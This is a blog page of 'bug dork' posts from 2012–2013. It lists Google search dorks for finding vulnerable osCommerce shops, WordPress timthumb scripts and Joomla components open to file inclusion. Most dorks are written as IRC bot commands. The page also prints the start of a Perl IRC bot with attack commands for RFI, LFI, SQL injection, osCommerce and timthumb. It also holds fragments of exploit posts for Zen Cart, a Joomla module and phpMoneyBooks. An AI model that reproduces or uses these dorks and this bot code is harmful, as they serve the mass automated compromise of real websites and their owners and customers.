Showing posts with label bug.
Monday, January 21, 2013
bug dork OScommerce new
!osco "creat new account.php" *shop by
!osco "by oscommerce" +payment by
!osco reviews.php *by oscommerce
!osco /admin/login.php *catalog *osc
!osco new_product.php *online store
!osco contact_us.php *site:.com
!osco /catalog/classes *site:.au
!osco /index.php?osCsid= Möchten Sie sich anmelden
!osco "specials.php?osCsid=" Get Them While They Are Hot.
!osco "Powered by osCommerce" "/osc/catalog/"
!osco "*.php?osCsid=" shop by
!osco "*.php?osCsid=" catalog by
!osco "*.php?cPath=" Powered by
!osco "*.php?cPath=" Hacked by
!osco "by oscommerce" online shop.
!osco "*.php?osCsid=" catalog
Wednesday, January 16, 2013
Boot perl Multi (tim,osco,e107,sql dll )
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $datetime = localtime;
my $fakeproc = "/usr/bin/perl";
my $ircserver = "irc.server.org";
my $ircport = "6667";
my $nickname = "DJok";
my $ident = "wantexz";
my $channel = "#wantexz";
my $admin = "wantexz";
my $fullname = "wantexz";
my $zenlogo = " 15( 4@ 12zen 15)";
my $lfilogo = " 15( 4@ 12LFI 15)";
my $rfilogo = " 15( 4@ 12RFI 15)";
my $e107logo = " 15( 4@ 12E107 15)";
my $xmllogo = " 15( 4@ 12XML 15)";
my $sqllogo = " 15( 4@ 12SQL 15)";
my $oscologo = " 15( 4@ 12OsCo 15)";
my $timologo = " 15( 4@ 12Timthumb 15)";
my $rficmd = '!rfi';
my $lficmd = '!lfi';
my $xmlcmd = '!xml';
my $zencmd = '!zen';
my $sqlcmd = '!sql';
my $e107cmd = '!e107';
my $oscocmd = '!osc';
my $timcmd = '!tim';
my $cmdxml = '!cmdxml';
my $cmdlfi = '!cmdlfi';
my $cmde107 = '!cmde107';
dork osco 2013
.osc /catalog/classes
.osc /images/product_info.php
.osc /oscommerce/images/product_info.php
.osc /oscommerce/product_info.php
.osc "*.php?14" osc
.osc shop "My Account | Cart Contents | Checkout
.osc "by oscommerce" +web
.osc "by oscommerce" +"/shop/"
.osc "/index" "by oscommerce" +nl
.osc "/index" "by oscommerce" +ru
.osc "/admin/file_manager.php"
.osc index.php?cPath= ".com"
.osc "/asc/"+"Hard Drives"
.osc /checkout_shipping.php?osCsid=
.osc /oscommerce/catalog/ +Willkommen Gast.
.osc /oscommerce/catalog/ +Welcome Guest.
.osc index.php catalog "Powered by osCommerce"
.osc by osCommerce" /oscommerce2/catalog/
.osc /index.php?osCsid= Möchten Sie sich anmelden
.osc "specials.php?osCsid=" Get Them While They Are Hot.
.osc "Powered by osCommerce" "/osc/catalog/"
Monday, January 14, 2013
Dork timthumb new 2013
!tim /wp-content/themes/modularity/includes/timthumb.php "Design by Graph Paper Press"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "/themes/cadabrapress/scripts/"
!tim /wp-content/themes/Avenue/timthumb.php "Avenue. All rights reserved."
!tim /wp-content/themes/thedawn/lib/scripts/timthumb.php "thedawn"
!tim /wp-content/themes/suffusion/timthumb.php "suffusion"
!tim /wp-content/themes/newsworld/thumbopen.php "Powered by NewsWorld"
!tim /wp-content/themes/widescreen/includes/timthumb.php "hide menu"
!tim /wp-content/themes/Nyke/timthumb.php "Nyke"
Monday, January 7, 2013
Dork Osco
!osco "creat new account" +catalog
!osco "by oscommerce" +payment by
!osco reviews.php *by oscommerce
!osco /admin/login.php *catalog *osc
!osco new_product.php *catalog
!osco contact_us.php *site:.tw
!osco /catalog/classes
Thursday, December 13, 2012
Bug Dork timthumb new
!tim /wp-content/themes/modularity/includes/timthumb.php "Design by Graph Paper Press"
!tim /wp-content/themes/cadabrapress/scripts/timthumb.php "/themes/cadabrapress/scripts/"
!tim /wp-content/themes/Avenue/timthumb.php "Avenue. All rights reserved."
!tim /wp-content/themes/thedawn/lib/scripts/timthumb.php "thedawn"
!tim /wp-content/themes/suffusion/timthumb.php "suffusion"
!tim /wp-content/themes/newsworld/thumbopen.php "Powered by NewsWorld"
!tim /wp-content/themes/widescreen/includes/timthumb.php "hide menu"
!tim /wp-content/themes/Nyke/timthumb.php "Nyke"
!tim /wp-content/themes/suffusion/timthumb.php "Suffusion WordPress theme by Sayontan Sinha"
!tim wp-content/themes/kingsize/timthumb.php "hide the navigation"
!tim wp-content/themes/headlines_enhanced/thumb.php "PLR Blogs � Sitemap � Privacy Policy"
!tim /wp-content/themes/classifiedstheme/thumbs/ "/wp-content/themes/classifiedstheme/thumbs/"
Saturday, September 15, 2012
Joomla spider calendar lite Remote Exploit
dork: inurl:com_spidercalendar
Date: [29-08-2012]
site: http://poisonsecurity.wordpress.com/
Vendor: http://web-dorado.com/products/spider-calendar-lite.html
Version: Last
License: Non-Commercial
Download: http://web-dorado.com/products/spider-calendar-lite.html
Component RokModule Blind SQLi
Joomla Component RokModule Blind SQLi [module] Vulnerability
Component name: Com_rokmodule
Vendor: http://www.rockettheme.com/
Tested on: Linux Backtrack
Zen Cart 1.3.8 Remote SQL Execution
#!/usr/bin/python
#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is available on http://www.zen-cart.com/
#
# BlackH :)
#
#
# Notes: must have admin/sqlpatch.php enabled
#
phpMoneyBooks Local File Inclusion
phpMoneyBooks' Local File Inclusion (CVE-2012-1669)
Mark Stanislav - mark.stanislav@gmail.com
I. DESCRIPTION
---------------------------------------
A vulnerability exists in index.php for module handling that allows for local file inclusion using
a null-byte attack on the 'module' GET parameter.
II. TESTED VERSION
---------------------------------------
1.0.2
III. PoC EXPLOIT
New Dork timthumb
wp-content/plugins/wp-marketplace/libs/timthumb.php
wp-content/plugins/wp-mobile-detector/timthumb.php
wp-content/plugins/wp-pagenavi/functions/timthumb.php
wp-content/plugins/wp-pagenavi/inc/timthumb.php
wp-content/plugins/wp-pagenavi/scripts/timthumb.php
wp-content/plugins/wp-pagenavi/timthumb.php
wp-content/plugins/wps3slider/scripts/timthumb.php
wp-content/plugins/wp-slick-slider/includes/timthumb/timthumb.php
wp-content/plugins/wptap-news-press-themeplugin-for-iphone/include/timthumb.php
wp-content/plugins/wp-thumbie/timthumb.php
wp-content/plugins/yd-export2email/timthumb.php
wp-content/plugins/yd-recent-posts-widget/timthumb/timthumb.php
wp-content/plugins/zingiri-web-shop/fws/addons/timthumb/timthumb.php
Bug,dork ,timthumb
wp-content/themes/themorningafter/tools/timthumb.php
wp-content/themes/OnTheGo/tools/timthumb.php
wp-content/themes/irresistible/tools/timthumb.php
wp-content/themes/Bold/tools/timthumb.php
wp-content/themes/busybee/tools/timthumb.php
wp-content/themes/Apz/tools/timthumb.php
wp-content/themes/Polished/tools/timthumb.php
wp-content/themes/postcard/tools/timthumb.php
wp-content/themes/TheCorporation/tools/timthumb.php
wp-content/themes/TheSource/tools/timthumb.php
wp-content/themes/openair/tools/timthumb.php
wp-content/themes/mymag/tools/timthumb.php
wp-content/themes/cityguide/tools/timthumb.php
wp-content/themes/object/tools/timthumb.php
wp-content/themes/Magnificent/tools/timthumb.php
Bug Dork Lfi
/index.php?option=com_myblog&Itemid=12&task= "com_myblog"
/index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
/index.php?option=com_sbsfile&controller= "com_sbsfile"
/index.php?option=com_rokdownloads&controller= "com_rokdownloads"
/index.php?option=com_sectionex&controller= "com_sectionex"
/index.php?option=com_ganalytics&controller= "com_ganalytics"
/index.php?option=com_janews&controller= "com_janews"
/index.php?option=com_linkr&controller= "com_linkr"
/index.php?option=com_rpx&controller= "com_rpx"
/index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
/index.php?option=com_gcalendar&controller= "com_gcalendar"
/index.php?option=com_ckforms&controller= "com_ckforms"